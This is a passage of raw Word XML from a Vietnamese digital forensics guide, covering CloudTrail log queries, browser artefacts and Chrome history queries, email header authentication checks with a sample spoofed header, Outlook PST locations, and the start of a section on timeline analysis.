          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>aws</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> athena start-query-execution </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="67"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>--query-string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/>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51"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>SELECT eventTime, userIdentity.arn, eventName,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">       sourceIPAddress, requestParameters</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>FROM cloudtrail_logs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>WHERE eventTime BETWEEN '2026-01-14' AND '2026-01-15'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">  AND errorCode IS NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ORDER BY eventTime"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DD91E7">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Ví dụ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFB63BB">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39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2026-01-14T22:38Z user/suspect GetSecretValue 185.220.101.47</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2026-01-14T22:40Z user/suspect S3:GetObject x847 185.220.101.47</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2026-01-14T22:44Z user/suspect CreateUser 185.220.101.47</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323254DA">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:spacing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Cân nhắc pháp lý:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Điều tra cloud thường cần preservation order, subpoena hoặc quy trình yêu cầu dữ liệu của nhà cung cấp. Nên gửi yêu cầu bảo toàn sớm vì log có thể bị xóa tự động sau 30-90 ngày hoặc theo chính sách tenant.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="48"/>
    <w:bookmarkEnd w:id="51"/>
    <w:p w14:paraId="2ADF534D">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="pháp-chứng-trình-duyệt-và-email"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>10. Pháp chứng trình duyệt và email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75751044">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i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Lịch sử web, tệp tải xuống, credential đã lưu và header email.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B67FE41">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="dấu-vết-trình-duyệt"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>10.1. Dấu vết trình duyệt</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2051"/>
        <w:gridCol w:w="7995"/>
      </w:tblGrid>
      <w:tr w14:paraId="402B8642">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1417A87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Artefact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1444196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Nội dung</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="17D41AF8">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5501ED4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History</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A8CE23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Mọi URL đã truy cập, thời gian và số lần truy cập, thường nằm trong SQLite.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="476AD6B4">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63588F4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Downloads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7233710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URL nguồn, tên tệp, thời điểm và đường dẫn đích.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="41B86210">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4BEF2B1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Cookies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3EE81EA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Session token, tùy chọn website và tracking; có thể chứng minh truy cập khi history đã bị xóa.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7AF42515">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33D66DE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Cache</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="045A327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Bản sao hình ảnh, HTML và JavaScript đã xem.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5B71E12B">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60D45A4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Form Data/Autofill</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2DE9015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Tên, địa chỉ, email và dữ liệu đã nhập một phần vào biểu mẫu hoặc ô tìm kiếm.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3A061802">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3816F3D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Saved Passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="602394B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Credential trong password manager, thường được mã hóa theo cơ chế hệ điều hành.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6FB99E41">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76B591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Session Restore</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0EC5769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Tab đang mở ở phiên gần nhất.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6C5589CB">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40D7F54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Favicons</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="138CCEB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Có thể giữ dấu vết website sau khi lịch sử bị xóa.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6A7B700D">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549E40D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Typed URLs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2561851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URL người dùng tự gõ, khác với liên kết được nhấp.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D4FC232">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="vị-trí-hồ-sơ-chrome"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Vị trí hồ sơ Chrome</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B3818A">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39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Windows: C:\Users\[user]\AppData\Local\Google\Chrome\User Data\Default\</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Linux:   ~/.config/google-chrome/Default/</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macOS:   ~/Library/Application Support/Google/Chrome/Default/</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="54"/>
    <w:p w14:paraId="02501654">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="truy-vấn-cơ-sở-dữ-liệu-history"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Truy vấn cơ sở dữ liệu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>History</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9B12E8">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65"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sqlite3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> History </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/>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51"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>SELECT datetime(last_visit_time/1000000-11644473600, 'unixepoch'),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">       url, visit_count, title</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>FROM urls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ORDER BY last_visit_time DESC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>LIMIT 50;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A9E30C">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Khi sao chép cơ sở dữ liệu đang được trình duyệt sử dụng, cần thu thập cả tệp WAL/SHM hoặc dùng bản sao snapshot để tránh bỏ lỡ giao dịch chưa checkpoint.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="53"/>
    <w:bookmarkEnd w:id="55"/>
    <w:p w14:paraId="1C537A0C">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="phân-tích-header-email"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>10.2. Phân tích header email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F8A103">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Header </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Received</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> được đọc từ dưới lên trên để tái dựng đường đi. Phải kiểm tra đồng thời SPF, DKIM và DMARC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121BC2F7">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39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Received: from mail.evil-attacker.com (185.220.101.47)</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 xml:space="preserve">  by mx.company.com with ESMTP</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 xml:space="preserve">  for &lt;ceo@company.com&gt;;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Authentication-Results:</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 xml:space="preserve">  spf=fail</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 xml:space="preserve">  dkim=permerror</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 xml:space="preserve">  dmarc=fail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B23543A">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Kết quả trên cho thấy email không vượt qua cơ chế xác thực và có khả năng là email giả mạo. Không nên kết luận chỉ dựa vào một trường vì phần header do người gửi kiểm soát có thể bị giả; ưu tiên các dòng do máy chủ tin cậy thêm vào.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="56"/>
    <w:p w14:paraId="1A1B3695">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="pstost-của-outlook"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>10.3. PST/OST của Outlook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDDC6F5">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Vị trí thường gặp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72977610">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39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>C:\Users\[user]\AppData\Local\Microsoft\Outlook\</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C:\Users\[user]\Documents\Outlook Files\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA96D51">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Phân tích PST/OST có thể phục hồi thư, lịch, danh bạ, tệp đính kèm, thư đã xóa và cấu trúc thư mục. Các công cụ thường dùng gồm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>readpst</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>, libpff, Autopsy, FTK, EnCase và Magnet AXIOM.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="52"/>
    <w:bookmarkEnd w:id="57"/>
    <w:p w14:paraId="2422022A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="X60fd5aa67b24ce18fed64ad82707b24e8bf824a"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>11. Phân tích dòng thời gian và Super Timeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C1C1F1">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i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Tương quan mọi artefact thành một câu chuyện theo thời gian.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3299985D">
      <w:pPr>
        <w:pStyle w:val="3"/>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Timeline analysis kết hợp timestamp từ nhiều nguồn thành một trình tự duy nhất: hệ thống tệp, Registry, Event Log, trình duyệt, Prefetch, Shimcache, mạng và nhiều nguồn khác. Khi tất cả sự kiện được đặt trên cùng trục thời gian, chuỗi tấn công và điểm bất thường trở nên rõ ràng hơn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FA5AB2">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
